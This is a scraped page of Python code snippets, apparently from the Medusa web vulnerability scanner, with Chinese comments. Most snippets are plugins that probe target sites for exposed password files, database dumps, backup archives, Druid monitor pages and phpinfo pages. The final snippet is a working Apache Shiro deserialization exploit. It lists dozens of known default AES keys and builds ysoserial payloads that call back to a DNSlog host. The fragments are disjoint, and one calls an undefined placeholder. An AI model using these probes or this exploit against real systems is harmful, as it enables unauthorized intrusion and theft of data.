def SubdomainWorkbench(Url):  #子域名搜索调用函数
    SubdomainList = []  #全局子域名列表
    SubdomainThreadPool = ThreadPool()  #定义一个子域名搜索线程池
    SubdomainThreadPool.Append(
        xxxx, Url=Url, SubdomainList=SubdomainList)  #传入全局的子域名列表,这样就能获取到结果了

    SubdomainThreadPool.Start(5)  #默认5个,后面使用配置文件
Exemple #2
0
def medusa(**kwargs)->None:
    Url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    payloads = ["/root.txt",
                      "/db.txt",
                      "/password.txt",
                      "/username.txt",
                      "/database.txt",
                "/1.txt",
                "/123.txt",
                "/a.txt",
                      ]
    Pool=ThreadPool()
    Headers["Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
    Headers["Accept-Encoding"] = "gzip, deflate"

    try:
        for payload in payloads:
            payload_url = Url+payload
            Pool.Append(task,Url=Url,headers=Headers,proxies=proxies,payload_url=payload_url,Uid=kwargs.get("Uid"),Sid=kwargs.get("Sid"))
        Pool.Start(thread_number)  # 启动线程池
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write("Plugin Name:" + _ + " ThreadPool ", e)  # 调用写入类传入URL和错误插件名
Exemple #3
0
def medusa(**kwargs) -> None:
    Url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    list = [
        '/index.html', '/datasource.html', '/sql.html', '/wall.html',
        '/webapp.html', '/weburi.html', '/websession.html', '/spring.html'
    ]
    Headers[
        "Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
    Headers["Accept-Encoding"] = "gzip, deflate"

    Pool = ThreadPool()
    try:
        for payload in list:
            payload_url = Url + '/druid' + payload
            Pool.Append(task,
                        Url=Url,
                        headers=Headers,
                        proxies=proxies,
                        payload_url=payload_url,
                        Uid=kwargs.get("Uid"),
                        Sid=kwargs.get("Sid"))
        Pool.Start(thread_number)  # 启动线程池
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write("Plugin Name:" + _ + " ThreadPool ",
                         e)  # 调用写入类传入URL和错误插件名
Exemple #4
0
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    suffixs = [
        ".zip", ".rar", ".tar.gz", ".tgz", ".7z", ".wim", ".lzh", ".cab",
        ".arj", ".lz4", ".db", ".gz", ".bz2 ", ".tar.bz2", ".xz ", ".tar.xz",
        ".z ", ".tar.z", ".zipx"
    ]
    payloads = [
        "/www.root",
        "/bbs",
        "/www",
        "/wwwroot",
        "/web",
        "/root",
        "/database",
        "/db",
        "/website",
        "/config_ucenter.php",
        "/config_global.php",
        "/1",
        "/123",
        "/a",
        "/新建文件夹",
    ]
    Headers[
        "Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
    Headers["Accept-Encoding"] = "gzip, deflate"

    Pool = ThreadPool()
    try:
        for suffix in suffixs:  #域名加上后缀
            payload_url = Url + "/" + url + suffix
            file_name = url + suffix
            Pool.Append(task,
                        url=url,
                        file_name=file_name,
                        headers=Headers,
                        proxies=proxies,
                        payload_url=payload_url,
                        Uid=kwargs.get("Uid"),
                        Sid=kwargs.get("Sid"))
        for payload in payloads:
            for suffix in suffixs:
                payload_url = Url + payload + suffix
                file_name = payload + suffix
                Pool.Append(task,
                            url=url,
                            file_name=file_name,
                            headers=Headers,
                            proxies=proxies,
                            payload_url=payload_url,
                            Uid=kwargs.get("Uid"),
                            Sid=kwargs.get("Sid"))
        Pool.Start(thread_number)  # 启动线程池
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write("Plugin Name:" + _ + " ThreadPool ",
                         e)  # 调用写入类传入URL和错误插件名
Exemple #5
0
def MedusaScan(WebScanUrl, WebScanUserToken, WebScanModule, WebScanThreads,
               WebScanAgentHeader):
    WebScanThreadPool = ThreadPool()  #定义一个线程池
    if WebScanAgentHeader == "false":
        Values = AgentHeader().result("None")
    else:
        Values = AgentHeader().result(WebScanAgentHeader)

    if WebScan(WebScanThreadPool, WebScanUrl, Values, WebScanUserToken,
               WebScanModule):
        WebScanThreadPool.Start(WebScanThreads)  # 启动多线程
Exemple #6
0
def MedusaScan(Url,Module,ScanThreads,Values,proxies,**kwargs):
    ScanThreadPool =ThreadPool()#定义一个线程池
    if Module=="all":
        for MedusaVulnerability in MedusaVulnerabilityList:
            MedusaVulnerabilityList[MedusaVulnerability](ScanThreadPool, Url, Values, proxies,**kwargs)#调用列表里面的值

    else:
        try:
            MedusaVulnerabilityList[Module](ScanThreadPool, Url, Values, proxies,**kwargs)  # 调用列表里面的值
        except:#如果传入非法字符串会调用出错
            pass
    ScanThreadPool.Start(ScanThreads)
Exemple #7
0
def MedusaScan(Url, Token, Module, WebScanThreads, Values):
    WebScanThreadPool = ThreadPool()  #定义一个线程池
    if Module == "all":
        for MedusaVulnerability in MedusaVulnerabilityList:
            MedusaVulnerabilityList[MedusaVulnerability](WebScanThreadPool,
                                                         Url, Values,
                                                         Token)  #调用列表里面的值
        WebScanThreadPool.Start(WebScanThreads)
    else:
        try:
            MedusaVulnerabilityList[Module](WebScanThreadPool, Url, Values,
                                            Token)  # 调用列表里面的值
            WebScanThreadPool.Start(WebScanThreads)
        except:  #如果传入非法字符串会调用出错
            pass
Exemple #8
0
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
    proxies=Proxies().result(proxies)
    list = ['/index.html', '/datasource.html', '/sql.html', '/wall.html', '/webapp.html', '/weburi.html',
            '/websession.html', '/spring.html']
    headers = {
        'User-Agent': RandomAgent,
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
    }
    Pool=ThreadPool()
    try:
        for payload in list:
            payload_url = Url + '/druid' + payload
            Pool.Append(task,Url=Url,headers=headers,proxies=proxies,payload_url=payload_url,Uid=kwargs.get("Uid"),Sid=kwargs.get("Sid"))
        Pool.Start(thread_number)  # 启动线程池
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write("Plugin Name:"+_+" ThreadPool ",e)  # 调用写入类传入URL和错误插件名
Exemple #9
0
def medusa(**kwargs) -> None:
    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    list = [
        '/index.php', '/1.php', '/2.php', '/3.php', '/4.php', '/5.php',
        '/6.php', '/7.php', '/8.php', '/9.php', '/10.php', '/11.php',
        '/12.php', '/13.php', '/123.php', '/1234.php', '/12345.php',
        '/123456.php', '/a.php', '/b.php', '/c.php', '/d.php', '/e.php',
        '/f.php', '/g.php', '/h.php', '/i.php', '/j.php', '/k.php', '/l.php',
        '/m.php', '/n.php', '/o.php', '/p.php', '/q.php', '/r.php', '/s.php',
        '/t.php', '/u.php', '/v.php', '/w.php', '/x.php', '/y.php', '/z.php',
        '/php.php', '/abc.php', '/test.php', '/test1.php', '/test2.php',
        '/test3.php', '/test123.php', '/info.php', '/phpinfo.php',
        '/iProber.php', '/iProber1.php', '/iProber2.php', '/iProber3.php',
        '/test_phpinfo.php', '/tools/info.php', '/ship/phpinfo.php',
        '/web/info.php', '/web/phpinfo.php', '/xampp/info.php',
        '/xampp/phpinfo.php', '/index.php?act=phpinfo',
        '/dashboard/phpinfo.php'
    ]
    Pool = ThreadPool()
    Headers[
        "Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
    Headers["Accept-Encoding"] = "gzip, deflate"

    try:
        for payload in list:
            payload_url = url + payload
            Pool.Append(task,
                        Url=url,
                        headers=Headers,
                        proxies=proxies,
                        payload_url=payload_url,
                        Uid=kwargs.get("Uid"),
                        Sid=kwargs.get("Sid"))
        Pool.Start(thread_number)  # 启动线程池
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write("Plugin Name:" + _ + " ThreadPool ",
                         e)  # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:

    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    ExpClass = "JRMPClient"
    CipherKey = [
        "kPH+bIxk5D2deZiIxcaaaA==",
        "2AvVhdsgUs0FSA3SDFAdag==",
        "3AvVhmFLUs0KTA3Kprsdag==",
        "4AvVhmFLUs0KTA3Kprsdag==",
        "5AvVhmFLUs0KTA3Kprsdag==",
        "5aaC5qKm5oqA5pyvAAAAAA==",
        "6ZmI6I2j5Y+R5aSn5ZOlAA==",
        "bWljcm9zAAAAAAAAAAAAAA==",
        "wGiHplamyXlVB11UXWol8g==",
        "Z3VucwAAAAAAAAAAAAAAAA==",
        "MTIzNDU2Nzg5MGFiY2RlZg==",
        "U3ByaW5nQmxhZGUAAAAAAA==",
        "fCq+/xW488hMTCD+cmJ3aQ==",
        "1QWLxg+NYmxraMoxAXu/Iw==",
        "ZUdsaGJuSmxibVI2ZHc9PQ==",
        "L7RioUULEFhRyxM7a2R/Yg==",
        "r0e3c16IdVkouZgk1TKVMg==",
        "bWluZS1hc3NldC1rZXk6QQ==",
        "a2VlcE9uR29pbmdBbmRGaQ==",
        "WcfHGU25gNnTxTlmJMeSpw==",
        "OY//C4rhfwNxCQAQCrQQ1Q==",
        "5J7bIJIV0LQSN3c9LPitBQ==",
        "f/SY5TIve5WWzT4aQlABJA==",
        "bya2HkYo57u6fWh5theAWw==",
        "WuB+y2gcHRnY2Lg9+Aqmqg==",
        "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN",
        "3qDVdLawoIr1xFd6ietnwg==",
        "ZWvohmPdUsAWT3=KpPqda",
        "YI1+nBV//m7ELrIyDHm6DQ==",
        "6Zm+6I2j5Y+R5aS+5ZOlAA==",
        "2A2V+RFLUs+eTA3Kpr+dag==",
        "6ZmI6I2j3Y+R1aSn5BOlAA==",
        "SkZpbmFsQmxhZGUAAAAAAA==",
        "2cVtiE83c4lIrELJwKGJUw==",
        "fsHspZw/92PrS3XrPW+vxw==",
        "XTx6CKLo/SdSgub+OPHSrw==",
        "sHdIjUN6tzhl8xZMG3ULCQ==",
        "O4pdf+7e+mZe8NyxMTPJmQ==",
        "HWrBltGvEZc14h9VpMvZWw==",
        "rPNqM6uKFCyaL10AK51UkQ==",
        "Y1JxNSPXVwMkyvES/kJGeQ==",
        "lT2UvDUmQwewm6mMoiw4Ig==",
        "MPdCMZ9urzEA50JDlDYYDg==",
        "xVmmoltfpb8tTceuT5R7Bw==",
        "c+3hFGPjbgzGdrC+MHgoRQ==",
        "ClLk69oNcA3m+s0jIMIkpg==",
        "Bf7MfkNR0axGGptozrebag==",
        "1tC/xrDYs8ey+sa3emtiYw==",
        "ZmFsYWRvLnh5ei5zaGlybw==",
        "cGhyYWNrY3RmREUhfiMkZA==",
        "IduElDUpDDXE677ZkhhKnQ==",
        "yeAAo1E8BOeAYfBlm4NG9Q==",
        "cGljYXMAAAAAAAAAAAAAAA==",
        "2itfW92XazYRi5ltW0M2yA==",
        "XgGkgqGqYrix9lI6vxcrRw==",
        "ertVhmFLUs0KTA3Kprsdag==",
        "5AvVhmFLUS0ATA4Kprsdag==",
        "s0KTA3mFLUprK4AvVhsdag==",
        "hBlzKg78ajaZuTE0VLzDDg==",
        "9FvVhtFLUs0KnA3Kprsdyg==",
        "d2ViUmVtZW1iZXJNZUtleQ==",
        "yNeUgSzL/CfiWw1GALg6Ag==",
        "NGk/3cQ6F5/UNPRh8LpMIg==",
        "4BvVhmFLUs0KTA3Kprsdag==",
        "MzVeSkYyWTI2OFVLZjRzZg==",
        "CrownKey==a12d/dakdad",
        "empodDEyMwAAAAAAAAAAAA==",
        "A7UzJgh1+EWj5oBFi+mSgw==",
        "YTM0NZomIzI2OTsmIzM0NTueYQ==",
        "c2hpcm9fYmF0aXMzMgAAAA==",
        "i45FVt72K2kLgvFrJtoZRw==",
        "U3BAbW5nQmxhZGUAAAAAAA==",
        "ZnJlc2h6Y24xMjM0NTY3OA==",
        "Jt3C93kMR9D5e8QzwfsiMw==",
        "MTIzNDU2NzgxMjM0NTY3OA==",
        "vXP33AonIp9bFwGl7aT7rA==",
        "V2hhdCBUaGUgSGVsbAAAAA==",
        "Z3h6eWd4enklMjElMjElMjE=",
        "Q01TX0JGTFlLRVlfMjAxOQ==",
        "ZAvph3dsQs0FSL3SDFAdag==",
        "Is9zJ3pzNh2cgTHB4ua3+Q==",
        "NsZXjXVklWPZwOfkvk6kUA==",
        "GAevYnznvgNCURavBhCr1w==",
        "66v1O8keKNV3TTcGPK1wzg==",
        "SDKOLKn2J1j/2BHjeZwAoQ==",
    ]
    BLOCK_SIZE = AES.block_size
    PAD_FUNC = lambda s: s + ((BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(
        BLOCK_SIZE - len(s) % BLOCK_SIZE)).encode()
    AES_MODE = AES.MODE_CBC
    AES_IV = uuid.uuid4().bytes
    payload_url = scheme + "://" + url + ":" + str(port)
    YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
    Pool = ThreadPool()
    try:
        for key in CipherKey:
            DL = Dnslog()
            popen = subprocess.Popen(
                ["java", "-jar", YsoserialPath, ExpClass,
                 DL.dns_host()],
                stdout=subprocess.PIPE)
            file_body = PAD_FUNC((popen).stdout.read())
            Pool.Append(task,
                        Pool=Pool,
                        url=url,
                        file_body=file_body,
                        key=key,
                        AES_MODE=AES_MODE,
                        AES_IV=AES_IV,
                        payload_url=payload_url,
                        DL=DL,
                        proxies=proxies,
                        Uid=kwargs.get("Uid"),
                        Sid=kwargs.get("Sid"))
        Pool.Start(20)  #启动线程池
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write("Plugin Name:" + _ + " ThreadPool ",
                         e)  # 调用写入类传入URL和错误插件名